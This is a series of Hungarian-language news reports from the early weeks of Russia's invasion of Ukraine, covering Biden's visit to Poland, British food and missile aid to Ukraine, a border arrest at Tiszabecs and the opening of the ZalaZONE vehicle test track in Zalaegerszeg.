Elmondta azt is: eltekintve az elkövetett brutalitástól, kétségtelen, hogy a háború már most stratégiai vereséget jelent Oroszország számára. Hozzátette: Putyin azt gondolta, hogy az ukránok eldobják fegyvereiket, és nem fognak harcolni, az orosz erők viszont a büszke ukránok ellenállásába ütköztek.

Az oroszok nem verték szét a NATO-t, a Nyugat jelenleg erősebb és egységesebb mint valaha. Oroszország el akarta érni, hogy a NATO csökkentse jelenlétét a határainál, ehelyett Putyin az eddigi legszámottevőbb, több mint 100 ezer amerikai és más szövetséges katonát számláló európai jelenléttel szembesül – állapította meg az amerikai elnök.

Az amerikai erők nem azért vannak Európában, hogy konfliktust idézzenek elő Oroszországgal, hanem azért, hogy megvédjék a szövetségeseket – nyomatékosította. “Szent kötelességünk, hogy az 5. cikkely értelmében megvédjük a NATO minden négyzetcentiméterét” – tette hozzá.

Végezetül Biden, utalva II. János Pál mottójára, úgy fogalmazott: “ne féljetek, soha ne veszítsétek el a reményt”. Hangsúlyozta: a történelem időről időre arra tanítja az emberiséget, hogy “a legsötétebb pillanatok után a legnagyobb előrelépések következnek”. Az ukránok ma azt mutatják meg, hogy “az ember ereje nagyobb akármelyik diktátor akaratánál” – hangsúlyozta. “Az Isten szerelmére, az az ember nem maradhat hatalmon” – zárta beszédét az amerikai elnök.

The post Orosz agresszió: Biden hosszú küzdelemre készül appeared first on .

Nagy-Britannia kétmillió font (~900 millió forint) értékben próbál élelmiszer-szállítmányokat eljuttatni olyan ukrajnai térségekbe, amelyeket az orosz hadsereg bekerített – közölte szombaton Liz Truss brit külügyminiszter.

Truss tájékoztatása szerint az élelmiszersegélyeket az ukrán kormány kérte. A brit finanszírozással gyorssegélyként összeállított csomagban szárított és konzervélelmiszer, valamint ivóvíz van. A szállítmányok eljuttatására lengyelországi és szlovákiai raktárakat készítenek fel, a munka a jövő hét elején kezdődik. A brit külügyminiszter tájékoztatása szerint ezekből a raktárakból 25 teherautórakományt juttatnak el közúton és vasúton a leginkább rászoruló ukrajnai közösségeknek.

A londoni külügyi tárca közölte: Ukrajnában becslések szerint 12 millióan szorulnak humanitárius segítségre, de a tényleges szám valószínűleg sokkal magasabb. A minisztérium szerint alapvető fontosságú az adomány gyors eljuttatása, mivel fogy az idő a már bekerített, illetve bekerítéstől veszélyeztetett városok és települések elérésére.

Truss nyilatkozata szerint a brit stáb a lengyel és a szlovák partnerekkel, valamint az ukrán kormánnyal együtt éjt nappallá téve dolgozik azon, hogy a leginkább veszélyeztetettek megkaphassák a számukra égetően szükséges szállítmányokat. Az élelmiszeradomány része annak az összesen 400 millió fontos (180 milliárd forintos) segélyprogramnak, amelyre London az orosz invázió kezdete óta kötelezettséget vállalt. Ebből a csomagból 220 millió font az Ukrajnának nyújtandó közvetlen humanitárius segítség értéke.

London jelentős katonai segítséget is nyújt Ukrajnának. A Downing Street a héten bejelentette, hogy Nagy-Britannia további hatezer rakétát, köztük páncéltörőket szállít Ukrajnának, és 25 millió font pénzügyi segítséget is nyújt az ukrán fegyveres erőknek.

Az újabb rakétaszállítmánnyal tízezer fölé emelkedik az ukrán hadseregnek szállított brit rakétafegyverek száma. Nagy-Britannia ugyanis az orosz invázió kezdete óta már több mint négyezer páncéltörő fegyverrel látta el Ukrajnát, köztük Javelin típusú rakétákkal és úgynevezett új generációs könnyű páncéltörő fegyverrendszerekkel (Next-Generation Light Anti-Tank Weapons Systems, NLAWS).

A brit kormány emellett Starstreak típusú hordozható légvédelmi rakétarendszereket is szállít Ukrajnának.

Az Interpol által körözött orosz férfit fogtak el Tiszabecsnél
Az Interpol által körözött orosz férfit fogtak el a rendőrök a tiszabecsi határátkelőhelyen – közölte a rendőrség honlapján a Szabolcs-Szatmár-Bereg Megyei Rendőr-főkapitányság. Mint írták, a tiszabecsi közúti határátkelőhelyen jelentkezett belépésre egy 35 éves orosz állampolgárságú férfi nem sokkal hajnali 1 óra előtt. A rendőrök az ellenőrzés alatt megállapították, hogy a férfi ellen az orosz hatóság az Interpol rendszerben halált okozó testi sértés és emberölés bűncselekmények elkövetése miatt elfogatóparancsot adott ki. A rendőrök a körözött férfit előállították a Fehérgyarmati Rendőrkapitányságra és őrizetbe vették. A főkapitányság közleményében jelezte, a Szabolcs-Szatmár-Bereg megyei határátkelőhelyekre továbbra is folyamatosan érkeznek az Ukrajnában zajló háború elől menekülők. A rendőrök a gördülékeny és folyamatos beléptetés mellet kiemelt figyelmet fordítanak a Magyarország területére érkező személyek alapos ellenőrzésére.

The post Orosz agresszió: Nagy-Britannia élelmiszersegélyeket küld az orosz hadsereg által bekerített ukrajnai térségekbe appeared first on .

Világszínvonalú fejlesztéseket jelent Zalaegerszegen a Rheinmetall harcjárműgyára és a ZalaZONE Járműipari Tesztpálya, amelyek együttesen több mint százmilliárd forint értékű beruházással valósultak meg – jelentette be Palkovics László.

Az innovációs és technológiai miniszter a harcjárműgyár műszaki átadása és a ZalaZONE Járműipari Tesztpálya avatása kapcsán beszélt arról, hogy a magyar állam és a német Rheinmetall közös beruházásában, 60 milliárd forintból épült meg a Lynx gyalogsági harcjárműveket gyártó üzem a zalai megyeszékhelyen. A mintegy 18 hektáros területen a közel 30 ezer négyzetméteres gyártócsarnok épülete már áll, a termelés várhatóan 2023 elején megindul.

A fejlesztéshez kapcsolódóan a ZalaZONE Járműipari Tesztpálya meglévő elemei kiegészülnek az off-road járművek speciális igényeihez igazodó tesztkörnyezettel is, mintegy 30 hektáros területen. Megépült már egy klímakamra, egy 250 méter hosszú, tesztelési célú lőcsatorna, és az off-road járművek összesen 15 különböző képességének vizsgálatára, ellenőrzésére alkalmas tesztpályaelemek – ismertette a miniszter.

A harcjárműgyár közvetlen szomszédságában valósult meg 45 milliárd forintos fejlesztésként a ZalaZONE Európában egyedülálló, ugyanakkor világszínvonalú kutatás-fejlesztési infrastruktúrája. Abban áll az egyedisége, hogy a hagyományos járműdinamikai tesztek mellett az automatizált, hálózatba kapcsolt, illetve elektromos járművek vizsgálatát, fejlesztését is lehetővé teszi – jelezte Palkovics László.

Hozzátette: a beruházás első ütemeként 2019-re készült el a felhasználók számára irodákat, műhelyeket biztosító tesztközpont és az első három pályaelem, vagyis a dinamikai felület, a nagy sebességre tervezett kezelhetőségi pálya, illetve a Smart City, amelyekkel már megkezdődött az üzleti célú hasznosítás is. Az elmúlt két évben a létesítmény a Smart City Zóna további szakaszai mellett újabb nyolc modullal bővítette szolgáltatási portfólióját, köztük fékfelülettel, autópályaszakasszal, országúti modullal, egy egyetemi pályamodullal, alacsony tapadású kezelhetőségi pályával, valamint zajmérőfelülettel és emelkedőkkel.

A miniszter kitért arra is, hogy a ZalaZONE működésében már kezdetektől jelen vannak az egyetemek és a kutatóintézetek is. Kutatási hálózati együttműködés jött létre mostanra a Budapesti Műszaki és Gazdaságtudományi Egyetem, a győri Széchenyi István Egyetem, a veszprémi Pannon Egyetem, a Bay Zoltán Alkalmazott Kutatási Közhasznú Nonprofit Kft. és több nyugat-európai felsőoktatási intézmény részvételével. A tesztpályához kapcsolódó kutatás-fejlesztési tevékenységek helyszíne a létesítmény szomszédságában kialakított Science Park.

Mindezeken felül saját fejlesztőközpontot alapít a ZalaZONE környezetében az osztrák AVL független mérnöki cég magyar leányvállalata, a járműipari gyártó Robert Bosch, valamint a piacvezető műszaki minősítő TÜV Rheinland. A járműipari tesztpályán ötmilliárd forintos beruházással hozza létre egyik vidéki bázisát a Védelmi Innovációs Kutatóintézet. Már most több mint ötszáz fejlesztő számára létesülnek új munkahelyek, miközben további cégekkel is előrehaladott tárgyalások folynak – fűzte hozzá Palkovics László.

Úgy értékelt, hogy a high-tech gyártási és kutatás-fejlesztési kapacitások bővítése megalapozza Magyarországon a tudásalapú gazdaság megerősítését és megteremti a fenntartható növekedés feltételeit. A versenyképes kutatási infrastruktúráknak és a köréjük épülő innovációs ökoszisztémáknak köszönhetően hazánk európai szinten is élenjáró szerepet tölthet be a korszakváltó technológiák meghonosításában – mondta.

A gazdasági növekedésben, foglalkoztatásban és kivitelben egyaránt meghatározó járműipar globális trendjeivel lépést tartva, a nemzeti önrendelkezésben és önellátásban is meghatározó védelmi ipart újjáépítve, új munkahelyek létesülnek a magas hozzáadott értéket termelő szektorokban, s ezzel az ország innovációs teljesítménye tovább javul – részletezte.

Palkovics szerint ezen páratlan kapacitások, a köréjük épülő vállalati, egyetemi, kutatóintézeti és szakképzési bázisokkal együtt, megkerülhetetlen járműipari és innovációs központtá teszik Zala megyét.

The post Átadták a ZalaZONE tesztpályát appeared first on .

Európa stabilitása fontos Washington számára, az Egyesült Államok az egységes és biztonságos Európára támaszkodva vállalhatja fel globális szerepét – jelentette ki Joe Biden amerikai elnök szombaton Varsóban, a lengyel és az amerikai tárgyalóküldöttség megbeszélésének elején. Az elnök később “mészárosnak” nevezte Putyint.

Kétnapos lengyelországi látogatásának zárónapján Biden először Andrzej Duda elnökkel folytatott négyszemközti beszélgetést. Az ezt követő plenáris egyeztetések elején közölte: Dudával a többi között arról beszélt, hogy az Egyesült Államok “az egységes Európára és az európai biztonságra támaszkodva” képes vállalni a világ más részeiben betöltött szerepét.

A két világháború tapasztalata megmutatta, hogy Washingtonnak nemcsak Európával kapcsolatos, hanem globális érdekei szempontjából is “rendkívül fontos” Európa stabilitása – fűzte hozzá az amerikai elnök. Az ukrajnai háború kapcsán megerősítette: az Egyesült Államok kész megnyitni határait százezer ukrajnai menekült számára.

Hangsúlyozta a NATO egységének szükségességét is. Biden szerint az orosz elnök arra számított, hogy megosztja az észak-atlanti szövetséget, hogy ennek keleti szárnyát “széttördeli és leválasztja a Nyugatról”. “Ez viszont nem sikerült neki, mindnyájan együtt vagyunk” – húzta alá.

Kétszer is nyomatékosította: az észak-atlanti szerződés ötödik, a kollektív védelemről szóló cikkelye “szent kötelességvállalást” jelent Washington számára. “Tessék elhinni, hogy számíthattok ránk” – fogalmazott.

Bident Antony Blinken külügyminiszter, Lloyd Austin védelmi miniszter, valamint Jake Sullivan nemzetbiztonsági főtanácsadó kíséri a lengyelországi tárgyalásokon. A Dudával folytatott tárgyalásokat megelőzően, szombat délelőtt Biden, Blinken és Austin Varsóban Dmitro Kuleba ukrán külügyminiszterrel és Olekszij Reznyikov ukrán védelmi miniszterrel is találkozott.

A hivatalos lengyel-amerikai tárgyalások után, szombat délután Biden a varsói Nemzeti Stadionban a menekültek számára létesített ügyintéző központba látogatott el Mateusz Morawiecki lengyel kormányfő és Rafal Trzaskowski varsói főpolgármester kíséretében. A stadionban megtartott rövid sajtóértekezleten az amerikai elnök hihetetlennek nevezte a menekültek lelki erejét. “Az ukrán gyermekek olyasmiket mondtak, hogy imádkozzak édesapjukért, bátyjukért, nagyapjukért” – osztotta meg Biden benyomásait az újságírókkal.

A Mariupol bombázására vonatkozó újságírói kérdésre Biden kijelentette az orosz elnökről: “Putyin egy mészáros”.

The post Orosz agresszió: Biden mészárosnak nevezte Putyint appeared first on .

A több mint egy hónapja Oroszország által kezdett háborúban Washington humanitárius, biztonsági és gazdasági értelemben továbbra is támogatni fogja Ukrajnát – jelezte Antony Blinken amerikai külügyminiszter, miután Varsóban az ukrán védelmi és külügyi tárca vezetőivel találkozott.

Twitter közösségi oldalán Blinken megerősítette: Lloyd Austin amerikai védelmi miniszterrel együtt szombaton Varsóban találkozott Dmitro Kuleba ukrán külügyminiszterrel és Olekszij Reznyikov védelmi miniszterrel, és csatlakozott hozzájuk Joe Biden amerikai elnök is.

“Megígértük, hogy folytatjuk Ukrajna támogatását annak érdekében, hogy segítsünk kielégíteni az ukrán humanitárius, biztonsági és gazdasági szükségleteket, miközben Putyin inváziójának második hónapja kezdődik” – olvasható Blinken bejegyzésében.

Kuleba a találkozó után a lengyel közszolgálati hírtelevízióban (TVP Info) sugárzott videoüzenetében közölte: az Egyesült Államok kész újabb szankciókat kivetni Oroszországgal szemben. Beszámolója szerint a megbeszélésen azt is megvitatták, “hogyan lehet ösztönözni azon európai országokat, amelyek próbálnak nem csatlakozni a szankciókhoz”, és beszéltek arról is, mily módon és mely országokkal fognak együttműködni annak érdekében, hogy ne legyen helye a szankciók megkerülésének.

Kuleba aláhúzta a külföldi kikötők bezárásának fontosságát is az orosz hajók előtt, és a beszélgetés egyik fontos témájaként az orosz ostrom alatt álló Mariupol kikötőváros helyzetét nevezte meg. Szó esett továbbá az Ukrajnának szánt felszerelés szállításáról – közölte Kuleba. Részletekbe nem bocsátkozott, de jelezte: ez ügyben “újabb lépéseket tesznek”.

Az ukrán külügyminiszter a Reuters hírügynökségnek megerősítette: a varsói találkozón újabb, a védelmi együttműködés további fejlesztését érintő ígéretet kaptak az amerikai féltől.

The post Orosz agresszió: ösztökélnék a szankciótól húzódzkodó európai országokat appeared first on .

Elérkezett a megpróbáltatás órája, a mai nemzedék a sorsdöntő pillanatban él, a demokrácia és az autokrácia harca közepén áll – jelentette ki Joe Biden amerikai elnök pénteken a dél-lengyelországi Rzeszówban, ahol az amerikai 82. légideszant-hadosztály katonáival találkozott.

Az Antony Blinken amerikai külügyminiszter részvételével megtartott találkozón Biden megköszönte a katonák szolgálatát, és leszögezte: az Egyesült Államok sok vonatkozásban egyedülálló.

“A világ egyetlen olyan országa vagyunk, amely nem a földrajzi, nemzetiségi, vallási, faji vagy egyéb alapokon szerveződik, hanem az eszme köt össze minket” – jelentette ki. Az amerikai eszmei közösség lényege, hogy “minden férfi és nő egyenlő, bizonyos elidegeníthetetlen jogokat kaptak a Teremtőtől” A demokrácia a konszenzust igényli, most pedig elérkezett “a próba órája” – tette hozzá.

“A demokrácia és az oligarchia közötti harc közepette vagyunk, egy új fázisban” – fogalmazott. A katonákhoz fordulva az amerikai elnök azt mondta, hogy az ő nemzedékük sorsdöntő pillanatban találta magát.

“Minden negyedik, ötödik nemzedékben eljön az olyan pillanat, amely mindent alapvetően megváltoztat” – közölte, hozzátéve: a világ már nem lesz olyan, amilyen eddig volt.

“A kérdés az, hogy ki fog diadalmaskodni, a demokrácia és az értékek, amelyeket képviselünk, vagy pedig az autokrácia” – fogalmazott Biden.

Ukrajnában tett korábbi útjaira utalva Biden kijelentette: az ukránoknak “valóban erős gerince van”. Rendkívüli jelenségnek nevezte, hogy az ukrán civilek is “puszta kézzel állnak a tankok előtt, mondván «nem mozdulok el innen, itthon vagyok»”.

Az amerikai 82. légideszant-hadosztály mintegy ötezer katonáját februárban, az ukrajnai háború kitörését megelőző orosz-ukrán feszültség miatt telepítették Rzeszów térségébe, bővítve a 2016-ban Lengyelországba telepített amerikai kontingenst.

The post Orosz agresszió: Biden szerint itt a megpróbáltatás órája appeared first on .